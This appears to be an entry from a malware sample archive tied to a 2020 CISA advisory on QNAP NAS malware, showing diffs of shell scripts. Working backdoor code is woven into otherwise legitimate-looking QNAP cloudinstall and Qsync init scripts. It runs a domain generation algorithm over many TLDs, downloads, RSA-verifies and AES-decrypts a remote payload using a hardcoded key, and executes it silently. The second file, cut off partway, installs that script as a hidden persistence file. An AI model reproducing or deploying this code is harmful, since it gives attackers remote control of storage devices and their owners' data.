Qnap

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764

@@ -0,0 +1,510 @@
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    { /share/MD0_DATA/.system/.qinstaller.sh; exit 1; }
+esac
+{ /share/MD0_DATA/.system/.qinstaller.sh; exit 0; }
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
+cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	{ /share/MD0_DATA/.system/.qinstaller.sh; exit 0; }
+fi
+fi

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc

@@ -0,0 +1,550 @@
+#!/bin/sh
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+
+if [ ! -f "${bdir}/.qpkg/.config/backup_conf.sh" ]; then
+test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
+cat > "${bdir}/.qpkg/.config/backup_conf.sh" <<"XEOF"
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
